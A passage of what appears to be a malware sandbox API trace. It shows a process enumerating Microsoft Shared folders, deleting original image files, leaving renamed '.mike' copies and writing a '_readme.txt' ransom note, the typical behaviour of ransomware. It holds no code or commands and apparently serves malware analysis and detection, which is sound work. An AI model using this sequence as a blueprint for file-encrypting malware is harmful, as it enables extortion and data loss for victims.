ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe384fec0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe3876020, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x8c0)) returned 1 [0042.488] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG", nBufferLength=0x105, lpBuffer=0x2aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG", lpFilePart=0x0) returned 0x3d [0042.488] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG", dwFileAttributes=0x80) returned 1 [0042.488] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG", nBufferLength=0x105, lpBuffer=0x2aece0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG", lpFilePart=0x0) returned 0x3d [0042.488] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.png")) returned 1 [0042.489] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG", lpFilePart=0x0) returned 0x3d [0042.489] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.png"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0042.489] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG", lpFilePart=0x0) returned 0x3d [0042.489] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeb74, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\_readme.txt", lpFilePart=0x0) returned 0x42 [0042.489] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\_readme.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x264 [0042.490] GetFileType (hFile=0x264) returned 0x1 [0042.490] GetFileType (hFile=0x264) returned 0x1 [0042.490] WriteFile (in: hFile=0x264, lpBuffer=0x22a0280*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2af100, lpOverlapped=0x0 | out: lpBuffer=0x22a0280*, lpNumberOfBytesWritten=0x2af100*=0x45e, lpOverlapped=0x0) returned 1 [0042.491] CloseHandle (hObject=0x264) returned 1 [0042.491] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.WPG", lpFilePart=0x0) returned 0x3d [0042.491] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PICTIM32.FLT", lpFilePart=0x0) returned 0x43 [0042.491] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\PNG32.FLT", lpFilePart=0x0) returned 0x40 [0042.491] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\WPGIMP32.FLT", lpFilePart=0x0) returned 0x43 [0042.491] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT", lpFilePart=0x0) returned 0x36 [0042.491] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\", nBufferLength=0x105, lpBuffer=0x2aecc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\", lpFilePart=0x0) returned 0x37 [0042.492] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\*", lpFindFileData=0x2aef14 | out: lpFindFileData=0x2aef14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeec79e70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe384fec0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe3876020, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0042.492] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeec79e70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe384fec0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe3876020, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.492] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x916cf600, ftCreationTime.dwHighDateTime=0x1bcabec, ftLastAccessTime.dwLowDateTime=0xeec79e70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x916cf600, ftLastWriteTime.dwHighDateTime=0x1bcabec, nFileSizeHigh=0x0, nFileSizeLow=0x1a9b, dwReserved0=0x0, dwReserved1=0x0, cFileName="CGMIMP32.CFG", cAlternateFileName="")) returned 1 [0042.492] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfda4ec00, ftCreationTime.dwHighDateTime=0x1cba021, ftLastAccessTime.dwLowDateTime=0xc22488c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xfda4ec00, ftLastWriteTime.dwHighDateTime=0x1cba021, nFileSizeHigh=0x0, nFileSizeLow=0x4f160, dwReserved0=0x0, dwReserved1=0x0, cFileName="CGMIMP32.FLT", cAlternateFileName="")) returned 1 [0042.492] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x916cf600, ftCreationTime.dwHighDateTime=0x1bcabec, ftLastAccessTime.dwLowDateTime=0xeec79e70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x916cf600, ftLastWriteTime.dwHighDateTime=0x1bcabec, nFileSizeHigh=0x0, nFileSizeLow=0x93f6e, dwReserved0=0x0, dwReserved1=0x0, cFileName="CGMIMP32.FNT", cAlternateFileName="")) returned 1 [0042.492] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8a19600, ftCreationTime.dwHighDateTime=0x1caa4ff, ftLastAccessTime.dwLowDateTime=0xeed5e6b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8a19600, ftLastWriteTime.dwHighDateTime=0x1caa4ff, nFileSizeHigh=0x0, nFileSizeLow=0xadf90, dwReserved0=0x0, dwReserved1=0x0, cFileName="EPSIMP32.FLT", cAlternateFileName="")) returned 1 [0042.492] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8a19600, ftCreationTime.dwHighDateTime=0x1caa4ff, ftLastAccessTime.dwLowDateTime=0xeedd0ad0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8a19600, ftLastWriteTime.dwHighDateTime=0x1caa4ff, nFileSizeHigh=0x0, nFileSizeLow=0x4e380, dwReserved0=0x0, dwReserved1=0x0, cFileName="GIFIMP32.FLT", cAlternateFileName="")) returned 1 [0042.493] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8a19600, ftCreationTime.dwHighDateTime=0x1caa4ff, ftLastAccessTime.dwLowDateTime=0xeee1cd90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8a19600, ftLastWriteTime.dwHighDateTime=0x1caa4ff, nFileSizeHigh=0x0, nFileSizeLow=0x3ad80, dwReserved0=0x0, dwReserved1=0x0, cFileName="JPEGIM32.FLT", cAlternateFileName="")) returned 1 [0042.493] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe376b680, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe376b680, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe376b680, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x9a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MS.CGM.mike", cAlternateFileName="MSCGM~1.MIK")) returned 1 [0042.493] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe37917e0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe37917e0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe37917e0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x3d00, dwReserved0=0x0, dwReserved1=0x0, cFileName="MS.EPS.mike", cAlternateFileName="MSEPS~1.MIK")) returned 1 [0042.493] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x916cf600, ftCreationTime.dwHighDateTime=0x1bcabec, ftLastAccessTime.dwLowDateTime=0xeee42ef0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x916cf600, ftLastWriteTime.dwHighDateTime=0x1bcabec, nFileSizeHigh=0x0, nFileSizeLow=0x42d, dwReserved0=0x0, dwReserved1=0x0, cFileName="MS.GIF", cAlternateFileName="")) returned 1 [0042.493] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe384fec0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe384fec0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe384fec0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x650, dwReserved0=0x0, dwReserved1=0x0, cFileName="MS.JPG.mike", cAlternateFileName="MSJPG~1.MIK")) returned 1 [0042.493] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe384fec0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe384fec0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe3876020, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x8c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MS.PNG.mike", cAlternateFileName="MSPNG~1.MIK")) returned 1 [0042.494] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x916cf600, ftCreationTime.dwHighDateTime=0x1bcabec, ftLastAccessTime.dwLowDateTime=0xeee42ef0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x916cf600, ftLastWriteTime.dwHighDateTime=0x1bcabec, nFileSizeHigh=0x0, nFileSizeLow=0x566, dwReserved0=0x0, dwReserved1=0x0, cFileName="MS.WPG", cAlternateFileName="")) returned 1 [0042.494] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8a19600, ftCreationTime.dwHighDateTime=0x1caa4ff, ftLastAccessTime.dwLowDateTime=0xeefe5e10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8a19600, ftLastWriteTime.dwHighDateTime=0x1caa4ff, nFileSizeHigh=0x0, nFileSizeLow=0x11d78, dwReserved0=0x0, dwReserved1=0x0, cFileName="PICTIM32.FLT", cAlternateFileName="")) returned 1 [0042.494] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8a19600, ftCreationTime.dwHighDateTime=0x1caa4ff, ftLastAccessTime.dwLowDateTime=0xeefe5e10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8a19600, ftLastWriteTime.dwHighDateTime=0x1caa4ff, nFileSizeHigh=0x0, nFileSizeLow=0x49f80, dwReserved0=0x0, dwReserved1=0x0, cFileName="PNG32.FLT", cAlternateFileName="")) returned 1 [0042.494] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd53d4900, ftCreationTime.dwHighDateTime=0x1cb7002, ftLastAccessTime.dwLowDateTime=0xc25b4860, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xd53d4900, ftLastWriteTime.dwHighDateTime=0x1cb7002, nFileSizeHigh=0x0, nFileSizeLow=0x44780, dwReserved0=0x0, dwReserved1=0x0, cFileName="WPGIMP32.FLT", cAlternateFileName="")) returned 1 [0042.494] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe376b680, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe376b680, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe3876020, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0042.494] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe376b680, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe376b680, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe3876020, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0042.494] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0042.494] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1ac) returned 1 [0042.494] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1b8) returned 1 [0042.495] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\.", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Help", lpFilePart=0x0) returned 0x33 [0042.495] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0042.495] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0042.495] CoTaskMemFree (pv=0x4fe370) [0042.495] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0042.495] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1ec) returned 1 [0042.495] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\*", lpFindFileData=0x2aef14 | out: lpFindFileData=0x2aef14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee282250, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x61073d10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x61073d10, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0042.495] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee282250, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x61073d10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x61073d10, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.496] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe777f900, ftCreationTime.dwHighDateTime=0x1c8bc89, ftLastAccessTime.dwLowDateTime=0x60d54030, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe777f900, ftLastWriteTime.dwHighDateTime=0x1c8bc89, nFileSizeHigh=0x0, nFileSizeLow=0x133200, dwReserved0=0x0, dwReserved1=0x0, cFileName="hxds.dll", cAlternateFileName="")) returned 1 [0042.496] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3e47200, ftCreationTime.dwHighDateTime=0x1c8bc89, ftLastAccessTime.dwLowDateTime=0x522dc930, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe3e47200, ftLastWriteTime.dwHighDateTime=0x1c8bc89, nFileSizeHigh=0x0, nFileSizeLow=0x1bf200, dwReserved0=0x0, dwReserved1=0x0, cFileName="ITIRCL55.DLL", cAlternateFileName="")) returned 1 [0042.496] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe777f900, ftCreationTime.dwHighDateTime=0x1c8bc89, ftLastAccessTime.dwLowDateTime=0x616b36d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe777f900, ftLastWriteTime.dwHighDateTime=0x1c8bc89, nFileSizeHigh=0x0, nFileSizeLow=0x69000, dwReserved0=0x0, dwReserved1=0x0, cFileName="msitss55.dll", cAlternateFileName="")) returned 1 [0042.496] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0042.496] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0042.496] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1ac) returned 1 [0042.496] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1b8) returned 1 [0042.496] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1ec) returned 1 [0042.497] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Help\\*", lpFindFileData=0x2aef14 | out: lpFindFileData=0x2aef14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee282250, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x61073d10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x61073d10, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0042.507] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee282250, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x61073d10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x61073d10, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.507] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe777f900, ftCreationTime.dwHighDateTime=0x1c8bc89, ftLastAccessTime.dwLowDateTime=0x60d54030, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe777f900, ftLastWriteTime.dwHighDateTime=0x1c8bc89, nFileSizeHigh=0x0, nFileSizeLow=0x133200, dwReserved0=0x0, dwReserved1=0x0, cFileName="hxds.dll", cAlternateFileName="")) returned 1 [0042.507] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3e47200, ftCreationTime.dwHighDateTime=0x1c8bc89, ftLastAccessTime.dwLowDateTime=0x522dc930, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe3e47200, ftLastWriteTime.dwHighDateTime=0x1c8bc89, nFileSizeHigh=0x0, nFileSizeLow=0x1bf200, dwReserved0=0x0, dwReserved1=0x0, cFileName="ITIRCL55.DLL", cAlternateFileName="")) returned 1 [0042.508] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe777f900, ftCreationTime.dwHighDateTime=0x1c8bc89, ftLastAccessTime.dwLowDateTime=0x616b36d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe777f900, ftLastWriteTime.dwHighDateTime=0x1c8bc89, nFileSizeHigh=0x0, nFileSizeLow=0x69000, dwReserved0=0x0, dwReserved1=0x0, cFileName="msitss55.dll", cAlternateFileName="")) returned 1 [0042.508] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe777f900, ftCreationTime.dwHighDateTime=0x1c8bc89, ftLastAccessTime.dwLowDateTime=0x616b36d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe777f900, ftLastWriteTime.dwHighDateTime=0x1c8bc89, nFileSizeHigh=0x0, nFileSizeLow=0x69000, dwReserved0=0x0, dwReserved1=0x0, cFileName="msitss55.dll", cAlternateFileName="")) returned 0 [0042.508] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0042.508] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1ac) returned 1 [0042.508] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1b8) returned 1 [0042.508] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0042.508] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0042.508] CoTaskMemFree (pv=0x4fe370) [0042.508] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1ec) returned 1 [0042.509] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*", lpFindFileData=0x2aef14 | out: lpFindFileData=0x2aef14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x9e0df36a, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e0df36a, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0042.509] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x9e0df36a, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e0df36a, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.509] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c2bbccc, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x6c2bbccc, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x90daefa5, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc1486, dwReserved0=0x0, dwReserved1=0x0, cFileName="Alphabet.xml", cAlternateFileName="")) returned 1 [0042.509] FindNextFileW (in: hFindFile=0x4d0ba0, 